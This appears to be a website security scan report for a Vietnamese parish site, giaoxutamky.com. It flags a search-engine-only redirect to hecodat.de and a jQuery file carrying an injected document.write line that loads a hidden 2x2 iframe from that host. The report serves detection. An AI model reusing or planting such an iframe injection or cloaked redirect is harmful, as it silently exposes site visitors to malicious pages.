Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://giaoxutamky.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: giaoxutamky.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 11 Sep 2014 10:14:27 GMT Location: http://hecodat.de/zwmd.html?h=1084848 Server: Apache Content-Length: 221 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://giaoxutamky.com/ | 200 OK Content-Length: 9575 Content-Type: text/html | clean |
http://giaoxutamky.com/Scripts/jquery-1.6.1.min.js | 200 OK Content-Length: 91496 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1084848></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||! Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1084848 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1084848> | ||
http://giaoxutamky.com/index.php | 200 OK Content-Length: 9575 Content-Type: text/html | clean |
http://giaoxutamky.com/filehandler.php?folderpara=Gioi_Thieu&dir=Giá»i Thiá»u | 403 Forbidden Content-Length: 343 Content-Type: text/html | clean |
http://giaoxutamky.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://giaoxutamky.com/filehandler.php?folderpara=Tin_Tuc&dir=Tin Tức | 403 Forbidden Content-Length: 343 Content-Type: text/html | clean |
http://giaoxutamky.com/filehandler.php?folderpara=Sinh_Hoat_Dan_Chua&dir=Sinh hoạt dân Chúa | 403 Forbidden Content-Length: 343 Content-Type: text/html | clean |
http://giaoxutamky.com/filehandler.php?folderpara=Tin_Mung&dir=Tin Mừng | 403 Forbidden Content-Length: 343 Content-Type: text/html | clean |
http://giaoxutamky.com/filehandler.php?folderpara=Gio_Le&dir=Giá» Lá»
| 403 Forbidden Content-Length: 343 Content-Type: text/html | clean |
http://giaoxutamky.com/filehandler.php?folderpara=Giao_Ly_Cong_Dong&dir=Giáo Lý Cá»ng Äá»ng | 403 Forbidden Content-Length: 343 Content-Type: text/html | clean |
http://giaoxutamky.com/pagedetail.php?path=Gioi_Thieu/GioiThieu.html&title=Giá»i Thiá»u&folderpara=Gioi_Thieu&dir=Giá»i Thiá»u | 403 Forbidden Content-Length: 342 Content-Type: text/html | clean |
http://giaoxutamky.com/pagedetail.php?path=Tin_Mung/Tin_Mung_25_03_2012.html&title=Tin mừng Chúa Nháºt V Mùa Chay&folderpara=Tin_Mung&dir=Tin Mừng | 403 Forbidden Content-Length: 342 Content-Type: text/html | clean |
http://giaoxutamky.com/pagedetail.php?path=Ke_Chuyen/TamkyGiaoLyKySu.html&title=Tam Kỳ Giáo Lý ký sá»±&folderpara=Ke_Chuyen&dir=Ká» Chuyá»n | 403 Forbidden Content-Length: 342 Content-Type: text/html | clean |
http://giaoxutamky.com/pagedetail.php?path=Lop_Giao_Ly/KhoaBoiDuongGiaoLyHe2012.html&title=Khóa bá»i dưỡng Giáo Lý hè 2012&folderpara=Lop_Giao_Ly&dir=Lá»p Giáo Lý | 403 Forbidden Content-Length: 342 Content-Type: text/html | clean |
http://giaoxutamky.com/pagedetail.php?path=Tin_Tuc/DucMeLuHanh.html&title=Äá»n Thánh Äức Mẹ Lữ Hà nh á» Tam Kỳ&folderpara=Tin_Tuc&dir=Tin Tức | 403 Forbidden Content-Length: 342 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=giaoxutamky.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://giaoxutamky.com/
Result: giaoxutamky.com is not infected or malware details are not published yet.
Result: giaoxutamky.com is not infected or malware details are not published yet.